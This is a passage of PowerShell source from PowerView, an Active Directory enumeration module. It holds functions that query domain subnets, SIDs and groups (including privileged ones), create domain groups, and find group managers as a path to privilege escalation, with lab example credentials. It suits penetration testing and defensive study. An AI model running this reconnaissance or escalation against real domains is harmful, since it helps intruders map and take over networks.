Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainSubnet
Returns the current subnets in the domain.
.EXAMPLE
Get-DomainSubnet *admin* -Domain testlab.local
Returns all subnets with "admin" in their name in the testlab.local domain.
.EXAMPLE
Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
Returns all subnets with linked to the specified group policy object.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainSubnet -Credential $Cred
.OUTPUTS
PowerView.Subnet
Custom PSObject with translated subnet property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.Subnet')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$SiteName,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{
'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$SubnetSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
if ($SubnetSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^CN=.*') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$SubnetSearcher = Get-DomainSearcher @SearcherArguments
if (-not $SubnetSearcher) {
Write-Warning "[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
else {
try {
$GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
$IdentityFilter += "(objectguid=$GuidByteString)"
}
catch {
$IdentityFilter += "(name=$IdentityInstance)"
}
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)"
Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() }
else { $Results = $SubnetSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$Subnet = $_
}
else {
$Subnet = Convert-LDAPProperty -Properties $_.Properties
}
$Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet')
if ($PSBoundParameters['SiteName']) {
# have to do the filtering after the LDAP query as LDAP doesn't let you specify
# wildcards for 'siteobject' :(
if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) {
$Subnet
}
elseif ($Subnet.siteobject -like "*$SiteName*") {
$Subnet
}
}
else {
$Subnet
}
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_"
}
}
$SubnetSearcher.dispose()
}
}
}
function Get-DomainSID {
<#
.SYNOPSIS
Returns the SID for the current domain or the specified domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer
.DESCRIPTION
Returns the SID for the current domain or the specified domain by executing
Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
to search for domain controllers through LDAP. The SID of the returned domain controller
is then extracted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainSID
.EXAMPLE
Get-DomainSID -Domain testlab.local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainSID -Credential $Cred
.OUTPUTS
String
A string representing the specified domain SID.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([String])]
[CmdletBinding()]
Param(
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$SearcherArguments = @{
'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid
if ($DCSID) {
$DCSID.SubString(0, $DCSID.LastIndexOf('-'))
}
else {
Write-Verbose "[Get-DomainSID] Error extracting domain SID for '$Domain'"
}
}
function Get-DomainGroup {
<#
.SYNOPSIS
Return all groups or specific group objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties samaccountname,usnchanged,...". By default, all group objects for
the current domain are returned. To return the groups a specific user/group is
a part of, use -MemberIdentity X to execute token groups enumeration.
.PARAMETER Identity
A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
specifying the group to query for. Wildcards accepted.
.PARAMETER MemberIdentity
A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
specifying the user/group member to query for group membership.
.PARAMETER AdminCount
Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
.PARAMETER GroupScope
Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for.
Also accepts NotDomainLocal, NotGloba, and NotUniversal as negations.
.PARAMETER GroupProperty
Specifies a specific property to search for when performing the group search.
Possible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainGroup | select samaccountname
samaccountname
--------------
WinRMRemoteWMIUsers__
Administrators
Users
Guests
Print Operators
Backup Operators
...
.EXAMPLE
Get-DomainGroup *admin* | select distinguishedname
distinguishedname
-----------------
CN=Administrators,CN=Builtin,DC=testlab,DC=local
CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
CN=Schema Admins,CN=Users,DC=testlab,DC=local
CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
CN=Domain Admins,CN=Users,DC=testlab,DC=local
CN=DnsAdmins,CN=Users,DC=testlab,DC=local
CN=Server Admins,CN=Users,DC=testlab,DC=local
CN=Desktop Admins,CN=Users,DC=testlab,DC=local
.EXAMPLE
Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
samaccountname
--------------
Server Admins
.EXAMPLE
'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
usncreated : 13245
grouptype : -2147483646
samaccounttype : 268435456
samaccountname : Desktop Admins
whenchanged : 8/10/2016 12:30:30 AM
objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
objectclass : {top, group}
cn : Desktop Admins
usnchanged : 13255
dscorepropagationdata : 1/1/1601 12:00:00 AM
name : Desktop Admins
distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
whencreated : 8/10/2016 12:29:43 AM
instancetype : 4
objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGroup -Credential $Cred
.EXAMPLE
Get-Domain | Select-Object -Expand name
testlab.local
'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
distinguishedname
-----------------
CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
.OUTPUTS
PowerView.Group
Custom PSObject with translated group property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.Group')]
[CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[Alias('UserName')]
[String]
$MemberIdentity,
[Switch]
$AdminCount,
[ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')]
[Alias('Scope')]
[String]
$GroupScope,
[ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')]
[String]
$GroupProperty,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$GroupSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
if ($GroupSearcher) {
if ($PSBoundParameters['MemberIdentity']) {
if ($SearcherArguments['Properties']) {
$OldProperties = $SearcherArguments['Properties']
}
$SearcherArguments['Identity'] = $MemberIdentity
$SearcherArguments['Raw'] = $True
Get-DomainObject @SearcherArguments | ForEach-Object {
# convert the user/group to a directory entry
$ObjectDirectoryEntry = $_.GetDirectoryEntry()
# cause the cache to calculate the token groups for the user/group
$ObjectDirectoryEntry.RefreshCache('tokenGroups')
$ObjectDirectoryEntry.TokenGroups | ForEach-Object {
# convert the token group sid
$GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value
# ignore the built in groups
if ($GroupSid -notmatch '^S-1-5-32-.*') {
$SearcherArguments['Identity'] = $GroupSid
$SearcherArguments['Raw'] = $False
if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
$Group = Get-DomainObject @SearcherArguments
if ($Group) {
$Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
$Group
}
}
}
}
}
else {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^CN=') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$GroupSearcher = Get-DomainSearcher @SearcherArguments
if (-not $GroupSearcher) {
Write-Warning "[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
elseif ($IdentityInstance.Contains('\')) {
$ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
if ($ConvertedIdentityInstance) {
$GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
$GroupName = $IdentityInstance.Split('\')[1]
$IdentityFilter += "(samAccountName=$GroupName)"
$SearcherArguments['Domain'] = $GroupDomain
Write-Verbose "[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'"
$GroupSearcher = Get-DomainSearcher @SearcherArguments
}
}
else {
$IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['AdminCount']) {
Write-Verbose '[Get-DomainGroup] Searching for adminCount=1'
$Filter += '(admincount=1)'
}
if ($PSBoundParameters['GroupScope']) {
$GroupScopeValue = $PSBoundParameters['GroupScope']
$Filter = Switch ($GroupScopeValue) {
'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' }
'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' }
'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' }
'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' }
'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' }
'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' }
}
Write-Verbose "[Get-DomainGroup] Searching for group scope '$GroupScopeValue'"
}
if ($PSBoundParameters['GroupProperty']) {
$GroupPropertyValue = $PSBoundParameters['GroupProperty']
$Filter = Switch ($GroupPropertyValue) {
'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' }
'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' }
'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' }
'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' }
}
Write-Verbose "[Get-DomainGroup] Searching for group property '$GroupPropertyValue'"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
Write-Verbose "[Get-DomainGroup] filter string: $($GroupSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $GroupSearcher.FindOne() }
else { $Results = $GroupSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$Group = $_
}
else {
$Group = Convert-LDAPProperty -Properties $_.Properties
}
$Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')
$Group
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainGroup] Error disposing of the Results object"
}
}
$GroupSearcher.dispose()
}
}
}
}
function New-DomainGroup {
<#
.SYNOPSIS
Creates a new domain group (assuming appropriate permissions) and returns the group object.
TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-PrincipalContext
.DESCRIPTION
First binds to the specified domain context using Get-PrincipalContext.
The bound domain context is then used to create a new
DirectoryServices.AccountManagement.GroupPrincipal with the specified
group properties.
.PARAMETER SamAccountName
Specifies the Security Account Manager (SAM) account name of the group to create.
Maximum of 256 characters. Mandatory.
.PARAMETER Name
Specifies the name of the group to create. If not provided, defaults to SamAccountName.
.PARAMETER DisplayName
Specifies the display name of the group to create. If not provided, defaults to SamAccountName.
.PARAMETER Description
Specifies the description of the group to create.
.PARAMETER Domain
Specifies the domain to use to search for user/group principals, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
Creates the 'TestGroup' group with the specified description.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
.OUTPUTS
DirectoryServices.AccountManagement.GroupPrincipal
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('DirectoryServices.AccountManagement.GroupPrincipal')]
Param(
[Parameter(Mandatory = $True)]
[ValidateLength(0, 256)]
[String]
$SamAccountName,
[ValidateNotNullOrEmpty()]
[String]
$Name,
[ValidateNotNullOrEmpty()]
[String]
$DisplayName,
[ValidateNotNullOrEmpty()]
[String]
$Description,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$ContextArguments = @{
'Identity' = $SamAccountName
}
if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
$Context = Get-PrincipalContext @ContextArguments
if ($Context) {
$Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($Context.Context)
# set all the appropriate group parameters
$Group.SamAccountName = $Context.Identity
if ($PSBoundParameters['Name']) {
$Group.Name = $Name
}
else {
$Group.Name = $Context.Identity
}
if ($PSBoundParameters['DisplayName']) {
$Group.DisplayName = $DisplayName
}
else {
$Group.DisplayName = $Context.Identity
}
if ($PSBoundParameters['Description']) {
$Group.Description = $Description
}
Write-Verbose "[New-DomainGroup] Attempting to create group '$SamAccountName'"
try {
$Null = $Group.Save()
Write-Verbose "[New-DomainGroup] Group '$SamAccountName' successfully created"
$Group
}
catch {
Write-Warning "[New-DomainGroup] Error creating group '$SamAccountName' : $_"
}
}
}
function Get-DomainManagedSecurityGroup {
<#
.SYNOPSIS
Returns all security groups in the current (or target) domain that have a manager set.
Author: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>, Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl
.DESCRIPTION
Authority to manipulate the group membership of AD security groups and distribution groups
can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
used to delegate management authority to distribution groups, but Windows supports security groups
being managed in the same way.
This function searches for AD groups which have a group manager set, and determines whether that
user can manipulate group membership. This could be a useful method of horizontal privilege
escalation, especially if the manager can manipulate the membership of a privileged group.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
Store a list of all security groups with managers in group-managers.csv
.OUTPUTS
PowerView.ManagedSecurityGroup
A custom PSObject describing the managed security group.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ManagedSecurityGroup')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{
'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))'
'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname'
}
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['Domain']) {
$SearcherArguments['Domain'] = $Domain
$TargetDomain = $Domain
}
else {
$TargetDomain = $Env:USERDNSDOMAIN
}
# go through the list of security groups on the domain and identify those who have a manager
Get-DomainGroup @SearcherArguments | ForEach-Object {
$SearcherArguments['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid'
$SearcherArguments['Identity'] = $_.managedBy
$Null = $SearcherArguments.Remove('LDAPFilter')
# $SearcherArguments
# retrieve the object that the managedBy DN refers to
$GroupManager = Get-DomainObject @SearcherArguments
$ManagedGroup = New-Object PSObject
$ManagedGroup | Add-Member Noteproperty 'GroupName' $_.samaccountname
$ManagedGroup | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname
$ManagedGroup | Add-Member Noteproperty 'ManagerName' $GroupManager.samaccountname
$ManagedGroup | Add-Member Noteproperty 'ManagerDistinguishedName' $GroupManager.distinguishedName
# determine whether the manager is a user or a group
if ($GroupManager.samaccounttype -eq 0x10000000) {
$ManagedGroup | Add-Member Noteproperty 'ManagerType' 'Group'
}
elseif ($GroupManager.samaccounttype -eq 0x30000000) {
$ManagedGroup | Add-Member Noteproperty 'ManagerType' 'User'
}
$ACLArguments = @{
'Identity' = $_.distinguishedname
'RightsFilter' = 'WriteMembers'
}
if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
